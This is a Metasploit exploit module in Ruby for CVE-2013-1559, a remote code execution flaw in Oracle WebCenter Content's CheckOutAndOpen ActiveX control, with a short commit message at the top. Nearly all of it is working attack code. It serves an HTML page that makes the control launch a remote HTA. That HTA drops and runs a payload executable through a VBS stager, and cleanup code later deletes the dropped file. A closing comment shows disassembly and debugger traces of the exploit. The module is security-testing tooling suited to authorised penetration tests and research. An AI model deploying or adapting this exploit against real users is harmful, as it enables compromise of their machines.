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Stacks of modules were using `extract_path` where it wasn't really semantically correct because this was the only way to expand environment variables. This commit fixes that up a bit. Also, I changed the existing `getenv` function in `stdapi` to `getenvs`, and had it support the splat operator. I added a `getenv` function which is used just for a single variable and uses `getenvs` behind the scenes. The meterpreter console `getenv` command now uses `getenvs`
258 lines
9.4 KiB
Ruby
258 lines
9.4 KiB
Ruby
##
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# This module requires Metasploit: http//metasploit.com/download
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# Current source: https://github.com/rapid7/metasploit-framework
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##
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require 'msf/core'
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class Metasploit3 < Msf::Exploit::Remote
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Rank = ExcellentRanking
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include Msf::Exploit::Remote::HttpServer::HTML
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include Msf::Exploit::EXE
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def initialize(info={})
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super(update_info(info,
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'Name' => "Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution",
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'Description' => %q{
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This modules exploits a vulnerability found in the Oracle WebCenter Content
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CheckOutAndOpenControl ActiveX. This vulnerability exists in openWebdav(), where
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user controlled input is used to call ShellExecuteExW(). This module abuses the
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control to execute an arbitrary HTA from a remote location. This module has been
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tested successfully with the CheckOutAndOpenControl ActiveX installed with Oracle
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WebCenter Content 11.1.1.6.0.
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},
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'License' => MSF_LICENSE,
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'Author' =>
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[
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'rgod <rgod[at]autistici.org>', # Vulnerability discovery
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'juan vazquez' # Metasploit module
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],
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'References' =>
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[
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[ 'CVE', '2013-1559' ],
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[ 'OSVDB', '92386' ],
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[ 'BID', '59122' ],
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[ 'URL', 'http://www.oracle.com/technetwork/topics/security/cpuapr2013-1899555.html' ],
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[ 'ZDI', '13-094' ]
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],
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'Payload' =>
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{
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'Space' => 2048,
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'StackAdjustment' => -3500
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},
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'DefaultOptions' =>
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{
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'InitialAutoRunScript' => 'migrate -f -k'
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},
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'Platform' => 'win',
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'Targets' =>
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[
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[ 'Automatic', {} ]
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],
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'Privileged' => false,
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'DisclosureDate' => "Apr 16 2013",
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'DefaultTarget' => 0))
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end
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def exploit
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@var_exename = rand_text_alpha(5 + rand(5)) + ".exe"
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@dropped_files = [
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@var_exename
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]
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super
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end
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def on_new_session(session)
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if session.type == "meterpreter"
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session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
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@dropped_files.delete_if do |file|
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win_file = file.gsub("/", "\\\\")
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begin
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wintemp = session.sys.config.getenv('TEMP')
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win_file = "#{wintemp}\\#{win_file}"
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session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
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session.fs.file.rm(win_file)
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print_good("Deleted #{file}")
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true
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rescue ::Rex::Post::Meterpreter::RequestError
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print_error("Failed to delete #{win_file}")
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false
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end
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end
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end
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end
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def build_hta(cli)
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var_shellobj = rand_text_alpha(rand(5)+5);
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var_fsobj = rand_text_alpha(rand(5)+5);
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var_fsobj_file = rand_text_alpha(rand(5)+5);
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var_vbsname = rand_text_alpha(rand(5)+5);
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var_writedir = rand_text_alpha(rand(5)+5);
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var_origLoc = rand_text_alpha(rand(5)+5);
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var_byteArray = rand_text_alpha(rand(5)+5);
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var_writestream = rand_text_alpha(rand(5)+5);
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var_strmConv = rand_text_alpha(rand(5)+5);
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p = regenerate_payload(cli);
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exe = generate_payload_exe({ :code => p.encoded })
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# Doing in this way to bypass the ADODB.Stream restrictions on JS,
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# even when executing it as an "HTA" application
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# The encoding code has been stolen from ie_unsafe_scripting.rb
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print_status("Encoding payload into vbs/javascript/hta...");
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# Build the content that will end up in the .vbs file
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vbs_content = Rex::Text.to_hex(%Q|
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Dim #{var_origLoc}, s, #{var_byteArray}
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#{var_origLoc} = SetLocale(1033)
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|)
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# Drop the exe payload into an ansi string (ansi ensured via SetLocale above)
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# for conversion with ADODB.Stream
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vbs_ary = []
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# The output of this loop needs to be as small as possible since it
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# gets repeated for every byte of the executable, ballooning it by a
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# factor of about 80k (the current size of the exe template). In its
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# current form, it's down to about 4MB on the wire
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exe.each_byte do |b|
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vbs_ary << Rex::Text.to_hex("s=s&Chr(#{("%d" % b)})\n")
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end
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vbs_content << vbs_ary.join("")
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# Continue with the rest of the vbs file;
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# Use ADODB.Stream to convert from an ansi string to it's byteArray equivalent
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# Then use ADODB.Stream again to write the binary to file.
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#print_status("Finishing vbs...");
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vbs_content << Rex::Text.to_hex(%Q|
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Dim #{var_strmConv}, #{var_writedir}, #{var_writestream}
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#{var_writedir} = WScript.CreateObject("WScript.Shell").ExpandEnvironmentStrings("%TEMP%") & "\\#{@var_exename}"
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Set #{var_strmConv} = CreateObject("ADODB.Stream")
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#{var_strmConv}.Type = 2
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#{var_strmConv}.Charset = "x-ansi"
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#{var_strmConv}.Open
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#{var_strmConv}.WriteText s, 0
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#{var_strmConv}.Position = 0
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#{var_strmConv}.Type = 1
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#{var_strmConv}.SaveToFile #{var_writedir}, 2
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SetLocale(#{var_origLoc})|)
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hta = <<-EOS
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<script>
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var #{var_shellobj} = new ActiveXObject("WScript.Shell");
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var #{var_fsobj} = new ActiveXObject("Scripting.FileSystemObject");
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var #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings("%TEMP%");
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var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs",2,true);
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#{var_fsobj_file}.Write(unescape("#{vbs_content}"));
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#{var_fsobj_file}.Close();
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#{var_shellobj}.run("wscript.exe " + #{var_writedir} + "\\\\" + "#{var_vbsname}.vbs", 1, true);
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#{var_shellobj}.run(#{var_writedir} + "\\\\" + "#{@var_exename}", 0, false);
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#{var_fsobj}.DeleteFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs");
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window.close();
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</script>
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EOS
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return hta
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end
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def on_request_uri(cli, request)
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agent = request.headers['User-Agent']
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if agent !~ /MSIE \d/
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print_error("Browser not supported: #{agent.to_s}")
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send_not_found(cli)
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return
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end
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print_status("Request received for #{request.uri}");
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if request.uri =~ /\.hta$/
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hta = build_hta(cli)
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print_status("Sending HTA application")
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send_response(cli, hta, {'Content-Type'=>'application/hta'})
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return
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end
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uri = "#{get_uri}#{rand_text_alpha(rand(3) + 3)}.hta"
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html = <<-EOS
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<html>
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<body>
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<object id="target" width="100%" height="100%" classid="clsid:A200D7A4-CA91-4165-9885-AB618A39B3F0"></object>
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<script>
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target.openWebdav("#{uri}");
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</script>
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</body>
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</html>
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EOS
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print_status("Sending HTML")
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send_response(cli, html, {'Content-Type'=>'text/html'})
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end
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end
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=begin
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* The vulnerable control tries to solve how to open the provided extension
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.text:100099FC lea eax, [ebp+830h+Src]
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.text:10009A02 push eax ; lpResult
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.text:10009A03 lea eax, [ebp+830h+Directory]
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.text:10009A06 push eax ; lpDirectory
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.text:10009A07 lea eax, [ebp+830h+PathName]
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.text:10009A0D push eax ; lpFile
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.text:10009A0E call ds:FindExecutableW ; This function returns the executable associated with the specified file for the default verb
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* If succeeds, the provided user data is used as argument:
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.text:10009D8F lea eax, [ebp+psz]
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.text:10009D95 mov [ebp+pExecInfo.lpFile], eax
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.text:10009D9B mov eax, [ebp+var_238]
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.text:10009DA1 mov [ebp+pExecInfo.cbSize], 3Ch
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.text:10009DAB mov [ebp+pExecInfo.fMask], 2000000h
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.text:10009DB5 mov [ebp+pExecInfo.hwnd], ebx
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.text:10009DBB mov [ebp+pExecInfo.lpVerb], offset aOpen ; "open"
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.text:10009DC5 jnb short loc_10009DCD
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.text:10009DC7 lea eax, [ebp+var_238]
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.text:10009DCD
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.text:10009DCD loc_10009DCD: ; CODE XREF: make_ShellExecute_sub_10009ACC+2F9j
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.text:10009DCD mov [ebp+pExecInfo.lpParameters], eax
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.text:10009DD3 lea eax, [ebp+pExecInfo]
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.text:10009DD9 push eax ; pExecInfo
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.text:10009DDA mov [ebp+pExecInfo.lpDirectory], ebx
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.text:10009DE0 mov [ebp+pExecInfo.nShow], 0Ah
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.text:10009DEA call ds:ShellExecuteExW
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* On the debugger:
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Breakpoint 1 hit
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eax=0201ef6c ebx=00000000 ecx=00000000 edx=03850608 esi=00000008 edi=00000000
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eip=10009dea esp=0201ee08 ebp=0201f200 iopl=0 nv up ei pl nz ac po nc
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cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212
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CheckOutAndOpen!DllUnregisterServer+0x7108:
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10009dea ff156cd20210 call dword ptr [CheckOutAndOpen!DllUnregisterServer+0x2a58a (1002d26c)] ds:0023:1002d26c={SHELL32!ShellExecuteExW (7ca02f03)}
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0:007> dd esp
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0201ee08 0201ef6c <== pExecInfo
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0:007> dd 0201ef6c
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0201ef6c 0000003c 02000000 00000000 10031468
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0201ef7c 0201efe0 03854688
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0:007> du 0201efe0
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0201efe0 "C:\WINDOWS\system32\mshta.exe"
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0:007> du 03854688
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03854688 ""http://192.168.172.1:8080/xKRTv"
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038546c8 "m0mqpAt7sEYdVq.hta""
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This code allows to launch other executables with user data provided as argument, but at the moment I like the HTA
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solution because it allows to pass URL's as arguments. And code executed by mshta is on a privileged zone. Other
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executables allow to provide SMB URI's but metasploit only allow to 'simulate' a SMB resource through webdav, so
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the target should have the WebClient service enabled, which is only enabled by default on XP SP3.
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=end
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